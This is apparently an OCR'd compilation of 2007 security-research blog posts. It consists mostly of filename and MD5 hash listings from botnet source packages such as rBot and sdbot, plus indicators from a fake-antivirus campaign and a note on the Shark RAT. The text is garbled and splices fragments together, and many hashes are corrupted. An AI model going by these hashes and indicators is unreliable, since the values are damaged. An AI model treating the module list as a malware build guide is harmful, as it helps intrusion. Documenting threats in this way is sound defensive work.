rBot.cpp eee3aef818delc5f73a8ed4c7256bael 
rBot.dsp 7f2d870f32ee00e55d90fe29f6174314 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
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rBot.h 
6d17278915220464f9502b8ce5451f67 
rBot.ncb cb59627077acad7d662706d7b5e8166b 
rBot.opt f0ef2fd617bba29c55e683b5ec07ab79 
rBot.plg 767700b387956e9dffcbf8f8483f8272 
rBot032.cpp 
88563449d64e97581006f5b63257cc7a 
rBot032.dsp 
66fd80cc0c04308707ad90ed27eb51d3 
rBot032.dsw 
8c589477e840a49afc4b633523970153 
rBot032.ncb 
f42d6c70d3b767a6cdfeaaec741d05ff 
rBot032.opt 
aa45f64baa35ebc9ba2ae98d531053dc 
rBot032.plg 
f496112603e9b386466463c489f9b09c 
readme!!!.txt 
€3549929e413aab727e4ef86d6525b02 
readme.html 
d5778375e5216ed16f908b2b382d2f6c 
readme.txt 
629f64e3d085dd9a8abd189fadl1flfed 
ReadWritelNI.bas 
f5f6e4ea846d5abbe347a9c5bdb89115 
recource.rc 
7¢022775d54b28ee94914a4de69e5aa4f 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
regcontrol.cpp 
2fe90dd6cac60e88ab6ca3ed83d424d6b 
regcontrol.h 


dbc9b0243d5f43cldad546b5e3bf1c80 
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content.onerateld.com/menacerescue.com/MenaceRescue/install en.exe 
content.onerateld.com/antispywaresuite.com/AntiSpywareSuite/install en.exe 
content.onerateld.com/trojansfilter.com/TrojansFilter/install en.exe 
content.onerateld.com/bestsellerantivirus.com/BestsellerAntivirus/install en.exe 


Therefore, if you have secureyourpc.com the directory structure would be /SecureyY- 
ourPC.com/SecureYourPC/install en.exe 


Sample domains portfolio of digitally alike samples of each of these : 


antivirusfiable.com 
antivirusmagique.com 
bastioneantivirus.com 
gubbishremover.com 
pchealthkeeper.com 
securepccleaner.com 
storageprotector.com 
trustedprotection.com 
yourprivacyguard.com 


DNS servers further expanding the domains portfolio : 


nsl.bestsellerantivirus.com 
ns2.bestsellerantivirus.com 
ns3.bestsellerantivirus.com 
ns4.bestsellerantivirus.com 
nsl.onerateld.com 
ns2.onerateld.com 


Main portfolio domain farm IPs : 


- [7]87.117.252.11 
- [8]85.12.60.22 

- [9]85.12.60.11 

- [10]85.12.60.30 


Laziness on behalf of the malicious parties in this campaign, leads to better detection 
rate, thus, they didn’t hedge the risks of having their releases detected by diversifying not 
just the domains portfolio, but the actual binaries themselves. 


. http://ddanchev. blogspot .com/2007/10/rbns-fake-security-software.html 


ttp://ddanchev.blogspot.com/2007/11/but-of-course-im-infected-with-spyware_18.htm 


. http: //ddanchev.blogspot.com/2007/11/scammy- ecosystem. htm 
. http://ddanchev. blogspot . com/2007/09/209-host- locked. htm 


. http: //ddanchev. blogspot .com/2007/11/661-host-locked. html 

. http: //ddanchev.blogspot .com/2007/10/assessing-rock-phish-campaign.htm 
. http: //img225. imageshack . us/img225/9795/portfolio01xp0. png 

. http: //img225. imageshack .us/img225/7826/portfolio02ib8 . png 

_ http: //img225. imageshack. us/img225/4622/portfolio03sw6 . png 

10. http: //img225 . imageshack. us/img225/7940/portfolio04di6é . png 
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remotecmd.cpp 
35014f60da50aef7b6a7al1 9ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 


reptile.cpp 
46e694bb1af932c653e9ab9490aff57a 
reptile.dep 
6fa3b86313e460467999c7bfb8c41f7e 
reptile.dsp 
c7b206ee8d08caed6e56897477e09f6a 
reptile.dsw 
a7097dcfc065b5e433a8749ac55db41f 
reptile.h 
1e13d2301a263a27b82bf5f0fbae35d7 
reptile.mak 
eba2043ee1f3199923304e711cc2dal10 
reptile.ncb 
66dd4be032be00d06ecaab1b51b33064 
reptile.opt 
304dc2f97c875648d97aeaeeb7366215 
reptile.plg 
5d59a8828c60f165d62a25c576bbb41d 
reptile.sin 
90bf17a33618855383b5e5a6adfaf357 
reptile.suo 


697d1cb2be6edab175cf56ffe7206ba2 
reptile. vcproj 
f320c52e237ada5286488b3b4cf6cdfa 
reptilepass.txt 
0e4255a3221bcce5d6c4df2be59088e7 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
res.rc 
81051bcc2cflbedf378224b0a93e2877 


resource.h 
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c7a8c15602d4621c67abd49dfdb0799b 
rfb.h 
fa322b6a29c2080dd3dbe97023bb0dd6 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 
dbc479f2720ba03cb946419fbef774e0 
rndnick.cpp 
fd0859d7697b2364d360d4574d54743d 
rndnick.h 
d79cOff7ab9e5ebd776450a62e577e54 
sasser.cpp 
181b0c8f420487ea06d693ee91deb153 
sasser.h f285bc67448b03f9d54a4ed5e62c58ea 
scan.cpp afb4362bf2b509a2d943fd226759463a 
scan.h 
6236be771c0c88df937f75845a064f12 
scanner.cpp 
ed5f0a804d62b378a9dc620832628950 
scanner.h 
c6a27c034250817a303519cc213f40db 
sd.prj 
fea4a676615001c93de4f42fa3355ce6 
sdbot.jpg 
66d3195097763a349ca84dc81aa05979 
sdbot04b.c 
b08fadea5c65c1b67f58717ed13aa8al 
sdbot04b.cpp 
790e0c632dfe0f81a24df0240e60a7ed 
sdbot04b.dsp 
ad2418b92f8d0ffe4e3ecfdf9b83f5 3f 
sdbot04b.dsw 
6dd1c304b071b40ece762ee9e8af1440 
sdbot04b.ncb 


ce00c9936e791b8d4651f91bd0527ab5 
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sdbot04b.opt 
1b8e1b7dc850845042771420589858ba 
sdbot05a.c 
€2821856358bb1d7b52bc30088d4e5b4 
SDBOTO5A.CPP 
€2821856358bb1d7b52bc30088d4e5b4 
sdbot05a.dsp 
5ab6d0460ae94d9a2fb0d9bb954cc908 
sdbot05a.dsw 
a087ab3d3223ff02c418b017d0410c82 
sdbot05b.asm 
c95619070cle58dffab4leec78156f22 
sdbot05b.c 
7a06444aee0d9ab6eee3b53732fe3609a 
sdbot05b.dsp 
7c7a1c02a694fd6fbe2a8alc575a8953 
sdbot05b.dsw 
11lac2f28922917d1f0ae90ea17f13241 
sdbot05b.IM.c 
3c30f3b9b037437dd4993ed3b267e255 
sdbot05b.ob} 
fa6a5fe770602a920cdd2c96280f424a 
sdbot05b. c 
e0c60e39dc9264b147e90a0ab3a9691c 
sdbot05b1.c 
df90e2fa6ae5a7074bbfb691b0f4729c 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
service.cpp 
3dad4e6945dc08f89f43cb6ee65d0aa0 
service.h 
792e15803e093c9fc96cafaabe7aea20 
session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
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session.h 
5f8¢353634b560052a5ebee5ef27ae32 
settings.h 
88e8eabee7e04543fe8d1cd586abcbc6 
shellcode.cpp 
b16b4f6éaaf8a8c11822c931dc84f77d4 
shellcode.h 
cal4f267b73bc867b075ca56f524d52e 
skysyn.cpp 
ee57eflcc3c9294cadc9096c74720c26 
skysyn.h c7d7710b27cce85f8bdea408945b238c 
sniffer.cpp 
5e4dfa78b8009ce6d41157cb3a7b87c0 
sniffer.h 
c8b1ca8f0ee388ef36e0b682cbd29d7f 
socks4.cpp 
7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h b103f307ffO2cd98fe2bfbecbd19c011 
speedtest.cpp 
cOa20bf215aclfd176905e198c6c5f33 
speedtest.h 
8bffbb4c46103dd62c6a64a83903434a 
spybot.c 5022db9724e5150a4a017fbf3bebb0a2 
spybot.mrc 
688e1a419ae4454f4f169180377d3f8Ff 

SRT.lib 
49146768cea042267d0b580a7b9045bc 
StdAfx.cpp 
7ce90447864ad00b0ff30e5331c6479d 
StdAfx.h bede0c518e62fc0f37579845427a7135 
strings.cfg 
56bf579fc2820d818750118e79c97646 
strings.h 
184bfd14931c231cc93ee735e62bc459 
stringsbckup.txt 
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582ef5dd0f94ced2e91a4fa09051a139 


stub.exe 5d9e0094c47b9de4473beal1d966c4f96 
sub7.cpp 9fb0314aaf9af4651145696305a8eeb4 


sub7.h 
c60800f9fecb35bb27384594b46feb22 
svchost.cpp 
d4fc73d18c9970e9ddae0e32be377546 
svchost.h 
49fe28536804b16/7fffaa5e5df7ficed 
syncbot.aps 
b9eaa73a3f3d8ce94fe73d2b41e8c37e 
syncbot.rc 
39daf682e8a8laabb86f42b6fab6a9d2 
synflood.cpp 
65495819ac28b79aced553dc8fc9d59F 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
1d59e5de3d5cdf50434f281a810512ce 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
s MyDoom.cpp 
ab44c53a5bcac9da274234723e76ed2c 
targa3.cpp 
d339cbafd73fe62de656ed28564fd395 


targa3.h f50c43771fa62711425f05adfa48bf14 


tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9f 
tcpflood2.cpp 
6ae6c6246df6aeca9bd82851b32c0d23 
tcpflood2.h 
f8307cc6251c3fce249a794314103804 
tcpip.h 
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41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
b75d055adaf7eal46a1a04078ea332c9 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
thcsql.cpp 
a061835d7679a51bba663b2a4f4e6c52 
thcsql.h 09a759a5deb484aaa4bd0f792a239a01 
thread.cpp 
06312d19ab623ce0d7357df29edb6bb6 
thread.h 1lce8e7879da8ade2dd864e8b31ab61cf9 
threads.cpp 
cbe0ba8b50028430092c7f0e78841b71 
threads.h 
f1b57b9f58ff94af8d2adeec8e7839e6 
tsunami.cpp 
9eaa22267f00ff05390b4a2d8d15ed0b 
tsunami.h 
6b6710a2d1a5ffc5c720dd01e42fa21de 
upnp.cpp 09a4b6a043981f61f2419a05423fc9Cc6 
upnp.h 
6be3f6b1cfecla51673271021f67cab6 
utility.cpp 
4c1078c6b4fdb32dbb205074d1a47751 
utility.h 
8bae67fec2e4cc271e50d9052c6e6724 
veritas.cpp 
d791b75478f4c3d57f5bb854f4fb9384 
veritas.h 
ledc6600327d36f4e0c2089c8fa23e7a 
version.c 
b0657cf0ed18b1d48316033c1c60cc2e 
version.h 
b0Ofe7fb5cfbe5b92fad9716a94091fe 


VIRC.vbp 47fb7065c9c781af48f7c0812a379735 
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VIRC.vbw 3e6acc26fe430de8b92a265cb499df19 
visit.cpp 
27f64f513a944ba46a905c796bce0c81 
visit. 
766e4add98e2cb96bd37e87f4d9dfff9 
vnc.cpp 
61¢c214bc5ad9c890bd29af1fd3b3f1c3 
vncexploit.c 
b9487e0e6d445445f1f26d6c8f588b62 
vncexploit.h 
3b74023d0be9a30870fa6a27a8151035 
vncps.cpp 
2c73b41f0a58faa705e3886a721a2b94 
vncps.h 
99bec3c207a21162b93169b0670f7d85 
vncrooter.cpp 
0408a485ae2dd8e16e19ae945534cd06 
vncrooter.h 
b1b3696a947bdfc64a498247f1d0ce32 
webdav.cpp 
03e209883598a3324f0376e2e2d68ce9 
webdav.h cblccbbb8ab3884e8e40ddb76a386bad 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
wins.cpp 76d3db6248ba2fe9d2d18da8abdb72cc 
wins.h 
a9a720198a6ff01d382f4cff17a8e429 
wisdom.cpp 
57ec22cc493830ae41daf80aeeb73b2a 
Wisdom.dep 
4ffo2a77b97d0223cbO0d04cbcab8cbd4 
Wisdom.dsp 
492039551f85799513ce745000740188 
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Wisdom.dsw 
4879f57e33afcce3e6c73c99ee371b04 
wisdom.h 46657173b16708f0108a81c24789bbe7 
Wisdom.mak 
374171afdd2de871334130e5751cc466 
Wisdom.ncb 
5d46ce6214cbb74d860b91013d9129cc 
Wisdom.opt 
c2869f1b950ad058c77666f557349elf 
Wisdom.plg 
989983e05ada49be4f9eaba676478627 
wkssvc.cpp 

efcffoefbef4d7 75aafbdacfe908e2bf 
wkssvc.h 40cbf340990988e1214bc77e02d2ad93 
wonk.cpp 9ff88d4a945b758d5f0ce676743088e5 
wonk.h 
7802ded7ce139e1246a9bed56e4c04f8 
workstation.cpp 
1732172ec7b89aa3cfalf6326e39bef9 
workstation.h 
fo7c2b6c9c33845f09d6eea7f29c1e70 
xscan.cpp 
bbbOfcead75db68fc2ce9238741421Ff8 
xscan.h 
c67d944559e747clee795c57fb616d8d 
120.cpp 
8780e827a722909ef024e1af426532d2 
120.dsp 
7358121ba04337377658de8ccf6c9eb7 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
a15b6e3aec1615987ba6893bfcbc592f 
120.ico 


cl1f0feb36e6cdfbf699525c72a683d0e 
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120.ncb 
ce909dcbffa88c658deb95807694eec2 
120.opt 
32081b1f1212a874742a698e8f19e6c1 
120.plg 
70fd85c17791cb2d15c2b3e320f7924b 
120.rc 
676eebd28fd44cde86c701857ed50769 
Adv.cpp 
d365c539723aa3a7d38a127a72c82626 
Adv.h 
287bdeel2a102aeb33d79067c7e328c0 
botkiller.cpp 
03c6b85198decd1ff8ccd782a86acfd4 
botkiller.h 
a71e71de8fb056658439934327df0ed0 
CleanUp.bat 
d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 
70c2eae4f52c272c63aa2a59597203d6 
Conf.h 
a6dcf30c2451496106lad0ee8acO01llea 
Crc.cpp 
f8f8f36234f11fc2148fbb06912ca454 
Crc.h 
fee33b0009142a39a062c9ae2edd0fb8 
Cry.cpp 
450ad6c95f6c28d8a65d69f0f1f0018e 
Cry.h 
68f4927efd75fc1314316ed63dec5a02 
d3des.c 
€259805a2bae810b780140dd388c1191 
d3des.h 
35cd1a965963d32df92f8087ff642cd1 
ddos.cpp fd75afad4cd9722913611587510113f2 


12131 


ddos.h 
30a540317bf24202fb82408e4582200c 
Def.h 
46df488cel2ea75dfaaae685fae271df 
encrypt.exe 
e€20f3260419d966d4393fac3ab17654c 
Ext.h 
c828591bdcffe63481668fc821cef196 
ftpd.cpp 23dd23decd0964dd8e5a6cbhd7e2886bc 
ftpd.h 
48a891506c957340b207b627105d7bb4 
Fun.h 
3c822946eedd713ca709060cc98a5453 
Glo.h 
c96e029def5b6dal17307d935dbeafeee 
Ide.cpp 
5af0e8856dd215c2d408a7b7e43a209c 
Ide.h 
8a2194a0b52d9c0588daebe50b72e7dc 
Inc.h 
aa6924baef8e8b6a5ff02bb4841270bf2 
Key.cpp 
16cdf4f8588d213cOcelc6ec5544a14a 
Key.h 
Obf55d672ea6889bb0739329fc781208 
Ldil.cpp 29c604bd6314004cd17361a725e3ad8f 
Ldll.h 
2d449d631flede65f6b35850404b6055 
passwd.h 76a1c5b9e1f05586157c719c4b3e3a32 
patcher.cpp 
Odf064223bcc9dc32dd8d7152c33871e 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
rfb.h 
04d6bd675ae235411f6f6a33a0e8e147 
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3.12.4 The Shark Malware - New Version’s Coming (2007-12-10 03:29) 


a Remote Memory Execution 


Remote Victes Fle: (C\WINDOWS \system32 \omd.exe 


Remote Aggressor Fle! ¢-\ WINDOWS system 32 \cak exe 


Connected. Pv Load: 9% Memory Load: 16% (80,51 MB / 522,33 M8) Se: 00200-00 Png 253 


Remember Shark, the [1]DIY malware pitched as a Remote Administration Tool (RAT), whose 
publicity among script kiddies, [2]and the press given the easy with which an undetected mal- 
ware can be build with it, prompted the author behind the project to publicly announce that 
he’s shutting down work on the RAT? However, as it looks like, the project is still under de- 
velopment, and the author’s recent announcement of the upcoming version of Shark3 further 
confirms that the shut down announcement was valid by the time the publicity started to fade 
away. Here’re some screenshots of what’s to come in the new version : 
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Rnd.cpp 
d9f71315e9919e04e6968606efff3e56 
Rnd.h 
ece9c76d62ac4d37a8af5b31460f0847 
Shel.cpp 93287f9e08ee07d1bca553b541ff031e 
Shel.h 
bcfd1e03c33a67ddabc6f33el1a1b54a6 
sniff.cpp 
74fe63c205a2b785f7586fe43cba9f3f 
sniff.h 
5eebe93de4e03bf0bb118e35997743a9 
socks4.cpp 
76d4a2402672a728e1cc76062b13fd7a 
socks4.h b103f307ff02cd98fe2bfbecbd19c011 
Str.h 
6ffec6ed6d2cb9170c227d623c4e51d1 
Sys.cpp 
62c60d515cc93b1dcb490c57b5d06417 
Sys.h 
3230d67a188e32b532cc9b22a3e99072 
Tcp.h 
5680e8e630e33ed8f84b552fald14b87 
tcpip.h 
3464effd01374f2732b9c95252af9740 
Test.cpp 04bdc970cc63b08196baca3a73faa2ce 
Test.h 
e996ba078dc4ae97483506f6d5aleabc 
Thr.cpp 
0b7714505d4e0fec91567189d9dd3fa9 
Thr.h 
6ae9e4fb798b6f5fab33def9994898F9 
ver.c 
96bc28bdb5f658224488715da4264095 
ver.h 
6620d6b2e364aa00c67d8f6ba2bd6872 
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vncshit.cpp 
b918a73b9f6748a0d8b0f3629c6222ae 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 
mssql.cpp 
f45045f6acaded569efd509b836017aa 
mssql.h 
742394ed531laab2ecc958daf5305723e 
Netapi.cpp 
f2b0a9490d4579ebalcObffdd06d02f0 
Netapi.h 14381a22f0b04e78d1513ebfbe76a805 
netbios.cpp 
7de1a23079ddbb5530328d0fbd9efbb4 
netbios.h 
c996ebe0b58233ba23c05f9f8cba508F 
Sym.cpp 
664f810ffa736810660e302bc228956d 
Sym.h 
ab712d424efc398db3bbea274487c096 
vncshit.cpp 
fob601fcfd2ae1d134c0dd08387c05ad 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 
120.cpp 
594a9f4868e4a7d131591e049729499c 
120.dsp 
99dc208252c0a05e8000543b8eeb7d06 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
a15b6e3aec1615987ba6893bfcbc592f 
120.ico 
clf0feb36e6cdfbf699525c72a683d0e 
120.ncb 


£785dd34295548abead63ea04al3ad3d 
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120.opt 
3a72e79ede0b3eaf24b79268d71a526b 
120.plg 
e8cdfb2e048f533b9ff25bc5103b1044 
120.rc 
676eebd28fd44cde86c701857ed50769 
Adv.cpp 
d365c539723aa3a7d38a127a72c82626 
Adv.h 
287bdeel2a102aeb33d79067c7e328c0 
botkiller.cpp 
03c6b85198decd1ff8ccd782a86acfd4 
botkiller.h 
a71e71de8fb056658439934327df0ed0 
CleanUp.bat 
d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 
70c2eae4f52c272c63aa2a59597203d6 
Conf.h 
*725c9a2aa4635635b94bf31f23ec1b0 
Crc.cpp 
f8f8f36234f11fc2148fbb06912ca454 
Crc.h 
fee33b0009142a39a062c9ae2eddO0fb8 
Cry.cpp 
450ad6c95f6c28d8a65d69f0f1f0018e 
Cry.h 
68f4927efd75fc1314316ed63dec5a02 
d3des.c 
€259805a2bae810b780140dd388c1191 
d3des.h 
35cd1a965963d32df92f8087ff642cd1 
ddos.cpp fd75afad4cd9722913611587510113f2 
ddos.h 


30a540317bf24202fb82408e4582200c 
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Def.h 
46df488cel2ea75dfaaae685fae271df 
encrypt.exe 
e€20f3260419d966d4393fac3ab17654c 
Ext.h 
c828591bdcffe63481668fc821cef196 
ftpd.cpp 23dd23decd0964dd8e5a6cbhd7e2886bc 
ftpd.h 
48a891506c957340b207b627105d7bb4 
Fun.h 
3c822946eedd713ca709060cc98a5453 
Glo.h 
c96e029def5b6da17307d935dbeafeee 
Ide.cpp 
5af0e8856dd215c2d408a7b7e43a209c 
Ide.h 
8a2194a0b52d9c0588daebe50b72e7dc 
Inc.h 
30772343b0d5808ddelc79bda61d092d 
Key.cpp 
16cdf4f8588d213cOcelc6ec5544a14a 
Key.h 
Obf55d672ea6889bb0739329fc781208 
Ldil.cpp 29c604bd6314004cd17361a725e3ad8f 
Ldll.h 
2d449d631flede65f6b35850404b6055 
passwd.h 76a1c5b9e1f05586157c719c4b3e3a32 
patcher.cpp 
Odf064223bcc9dc32dd8d7152c33871e 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
pstore.cpp 
6eb93ef5cb29c9b6394cf8c87a4debfa 
pstorec.tlh 
b89c05a4531df0fd30c67bfcecc62e01 
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pstorec.tli 
92fdb3bb3207336cf4bb5bb64b6f0fa8 
rfb.h 
04d6bd675ae235411f6f6a33a0e8e147 
Rnd.cpp 
d9f71315e9919e04e6968606efff3e56 
Rnd.h 
ece9c76d62ac4d37a8af5b31460f0847 
Shel.cpp 93287f9e08ee07d1bca553b541ff031e 
Shel.h 
bcfd1e03c33a67ddabc6f33el1al1b54a6 
sniff.cpp 
74fe63c205a2b785f7586fe43cba9f3f 
sniff.h 
5eebe93de4e03bf0bb118e35997743a9 
socks4.cpp 
76d4a2402672a728e1cc76062b13fd7a 
socks4.h b103f307ff02cd98fe2bfbecbd19c011 
Str.h 
6ffec6ed6d2cb9170c227d623c4e51d1 
Sys.cpp 
62c60d515cc93b1dcb490c57b5d06417 
Sys.h 
3230d67a188e32b532cc9b22a3e99072 
Tcp.h 
5680e8e630e33ed8f84b552fa1d14b87 
tcpip.h 
3464effd01374f2732b9c95252af9740 
Test.cpp 04bdc970cc63b08196baca3a73faa2ce 
Test.h 
e996ba078dc4ae97483506f6d5aleabc 
Thr.cpp 
0b7714505d4e0fec91567189d9dd3fa9 
Thr.h 

6ae9e4fb7 98b6f5fab33def9994898F9 
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ver.c 
96bc28bdb5f658224488715da4264095 
ver.h 
6620d6b2e364aa00c67d8f6ba2bd6872 
vncshit.cpp 
5fac156d45231b5140b773811962d63e 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 
pstorec.tlh 
4dabffe8ae535827d15c102fcc3014e7 
pstorec. tli 
c8e0ce16f68dc3d54671c7699598cc80 
mssql.cpp 
f45045f6acaded569efd509b836017aa 
mssql.h 
742394ed531laab2ecc958daf5305723e 
Netapi.cpp 
f2b0a9490d4579ebalcObffdd06d02f0 
Netapi.h 14381a22f0b04e78d1513ebfbe76a805 
netbios.cpp 
7de1a23079ddbb5530328d0fbd9efbb4 
netbios.h 
c996ebe0b58233ba23c05f9f8cba508f 
pstore.cpp 
c4456a4a2f27f36ff974533cafffbe60 
Sym.cpp 
664f810ffa736810660e302bc228956d 
Sym.h 
ab712d424efc398db3bbea274487c096 
vncshit.cpp 
f6ob601fcfd2ae1d134c0dd08387c05ad 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 
120.cpp 
c7ec538e296059bba517863a1lb9ec68c 
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120.dsp 
b909936d44ca6446956ff6e01a9al14e0 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
al5b6e3aec1615987ba6893bfcbc592f 
120.ico 
c1lf0feb36e6cdfbf699525c72a683d0e 
120.ncb 
d0600a0e1d343d3dca442d775ca6c23e 
120.opt 
72¢€32452001a480e9ecb405c4e444al 
120.plg 
f8fc38729c407c9e5792755d0e394de3 
120.rc 
676eebd28fd44cde86c701857ed50769 
Adv.cpp 
66e84147969201776de022fadca8bb76 
Adv.h 
287bdeel2a102aeb33d79067c7e328c0 
CleanUp.bat 
d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 
f3b4e263ca0b52f6b5f9a2e901fdf885 
Conf.h 
a2d2a8d84d700b414e967d35ca43f6f4 
Crc.cpp 
f8f8f36234f11fc2148fbb06912ca454 
Crc.h 
fee33b0009142a39a062c9ae2eddO0fb8 
Cry.cpp 
3721dec52ab96f8374c24b29ce44dac8 
Cry.h 
68f4927efd75fc1314316ed63dec5a02 
d3des.cpp 
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f1261933a90acd18e363b73bb8b58504 
d3des.h 
35cd1a965963d32df92f8087ff642cd1 
ddos.cpp fd75afad4cd9722913611587510113f2 
ddos.h 
30a540317bf24202fb82408e4582200c 
Def.h 
f82a0f97774beaclaa7f9af7ea95052F 
encrypt.exe 
e€20f3260419d966d4393fac3ab17654c 
Ext.h 
dbca112013cf5eeac796205ceb1024c5 
Fun.h 
21dd0ab1897cc4cdf6e36f7dad2f2fd3 
Glo.h 
c96e029def5b6da17307d935dbeafeee 
Ide.cpp 
5af0e8856dd215c2d408a7b7e43a209c 
Ide.h 
8a2194a0b52d9c0588daebe50b72e7dc 
Inc.h 
f0c0b7f0839c712148c0ad78f6fb106b 
Ldil.cpp b965343fd9512c9b969aab1241f3c031 
Ldll.h 
2d449d631flede65f6b35850404b6055 
Pas.h 
afb1899a0f767e90ff9bd22209ab0e66 
Rnd.cpp 
27ef23d7d3b6e15eb6ccdd7674251ca8 
Rnd.h 
773602a01e847334df6100af4a26c3d4 
Shel.cpp 93287f9e08ee07d1bca553b541ff031e 
Shel.h 
bcfd1e03c33a67ddabc6f33el1a1b54a6 
Str.h 
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3082eb59a49b540e006b879b0ad4c1c2 
Sys.cpp 
df9558bf969f915e20a2f1b737bc567b 
Sys.h 
3230d67a188e32b532cc9b22a3e99072 
Tcp.h 
5680e8e630e33ed8f84b552fa1d14b87 


Test.cpp 04bdc970cc63b08196baca3a73faa2ce 


Test.h 
e996ba078dc4ae97483506f6d5aleabc 
Thr.cpp 
263d181d72a4082b0cc4a47132de8df4 
Thr.h 
a881351d00ae32899c94a69f7 7379120 
Asn.cpp 
9947a2456df330e3421a2f462378dfbb 
Asn.h 
c57e30fde41b1dfal1a159234e4e6475 
Netapi.cpp 
f2b0a9490d4579ebalcObffdd06d02f0 


Netapi.h 14381a22f0b04e78d1513ebfbe76a805 


Netbios.cpp 
132d4a6fd75c76f2bd6da6c6b06566fd 
Netbios.h 
a54523937044e354c94fa932139b5cf9 
Pnp.cpp 
0e8479818d8c01210368a3490c76dcd4 
Pnp.h 
5a320966fb8e40736cbe0b9a51b5c253 
Sym.cpp 
664f810ffa736810660e302bc228956d 
Sym.h 
ab712d424efc398db3bbea274487c096 
Vinc.cpp 
013428cc3743c2c7874c6c099657eecc 


12141 


vnc.h 
091d289ad5beebf2b717054dc8dea837 
Vncbrute.cpp 
ff2e601ed224dc19ba549beae96c49ad 
Vncbrute.h 
90fdede0180e5b940c6c28546ea193c1 
120.cpp 
126d09fbd00fc56bea738a338af585b6 
120.dsp 
20507d59fc0963fab727falae673eb11 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
b0ea6b82195207d090e6c24d61980c93 
120.ico 
clf0feb36e6cdfbf699525c72a683d0e 
120.ncb 
f456a98c9fda5517c2a68752036236ca 
120.opt 
a6b69716e4822b782dc361fb3cfbc2b0 
120.plg 
5b00257033278978d64faf73185ccd6éd 
120.rc 
e3d778e0ff3a77de7a3145a17626d740 
lreadme.txt 
5816c92688f435946cdb665f9c76a970 
Adv.cpp 
0c0b5c3e3ab3758c9a21e23c0dd676b3 
Adv.h 
087d0176e8cee3f1291d4b48b4e20479 
botkiller.cpp 
03c6b85198decd1ff8ccd782a86acfd4 
botkiller.h 
a71e71de8fb056658439934327df0ed0 
CleanUp.bat 

12142 


sherk ( mt) 


Wesows 


= & vb6.exe 


® apiload.exe 
(7) WB 6 API Dedaration Loader (131856) 


shark ( ) (RS - sherk 3.0.0 (723190) 
shark 3.0.0 (460262) 

sherk 3.0.0 (131566) 

5_Chent - Microsoft Visual Bask [Ausfihren] - [modCommand (Code)] (66096) 
$_Clent - Microsoft Visual Basic [Ausfuhren] (262648) 


Exfrost(sniper 109) (461006) 
Server (68820) 
Program Manager (65670) 


Screen Capture -Defeut_ifde 17b7 192. 168,173.24 (196964) 
File Manager - Defauit_lfde 1757 192.168.178.243 298s0) 
Bifrost v1.26 Private Bud = 2 users commected (395420) 


[331-872-275] - Messaging Window (133562) 
[op] - 331872275 (919990) 


® vb6.exe 
= 5_Server - Microsoft Visual Basic [Entwerfen] - [modDedare (Code)) (67126) 


s_Server - Microsoft Visual Basic [Entwerfen] (67120) 
VB-Ressourcen-Editer - F:\shark 3\Server|s_Server.RES (67240) 


Opened Windows: 19 Active Window: Windows 


Shark3 Window’s Info 


Pu Load: 10% Memory Load: 23% (118,65 MB / 511,33 MB) 


Ide: 00:00:00 


Ping: 48 ms 
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d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 
e73af685d00a799eedc313c0a8499ba6 
Conf.h 
cf12b3c6cbef00b529f3c85511947743 
Crc.cpp 
b8f60e826f3f161571d8e3f7b08465f5 
Crc.h 
024f7f17b3dac4091c5e80d032b98ec4 
Cry.cpp 
1a0f84756d5da53fefaf191f27457a7d 
Cry.h 
c49e198e5alc4f634d6f97002883c5bc 
d3des.c 
€259805a2bae810b780140dd388c1191 
d3des.h 
35cd1a965963d32df92f8087ff642cd1 
ddos.cpp a7bd4791b0388a510f8b3f66a1011e5e 
ddos.h 
11b29bda556a1770d027600fbb87dd55 
Def.h 
46fae457dd61317a89295e9506179851 
encrypt.exe 
e20f3260419d966d4393fac3ab17654c 
Ext.h 
5a3a677ec67170d0217d6037d1565a81 
ftpd.cpp 0f7a382e1a22140304a6908dc2760651 
ftpd.h 
48a891506c957340b207b627105d7bb4 
Fun.h 
08a9e5038a76c9be299324b0757a8302 
Glo.h 
c96e029def5b6dal7307d935dbeafeee 
icmpflood.cpp 
9f5517830b89419f8c55da5f0b08424d 
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icmpflood.h 
4462c6318220648820316848deb124fd 
Ide.cpp 
98dc154eab6153d133187eb189dfc7f3 
Ide.h 
0b892636d518555f5336a230e30cc906 
Inc.h 
ac099c0b8b6f4d24a66114363e9b080c 
Key.cpp 
16cdf4f8588d213c0celc6ec5544a14a 
Key.h 
Obf55d672ea6889bb0739329fc781208 
Ldil.cpp a99c9ff6ecbc05289c74e03b34d7c8fc 
Ldll.h 
€93576952251ef0ebc906c9f78eb629e 
passwd.h 50cee4baal6cb6a072ee6fa6114ff2de 
patcher.cpp 
8cd1760ea0ae3b8f82a8d06e82773c3c 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
pingudp.cpp 
392c0955449dae6c2467a2605add668a 
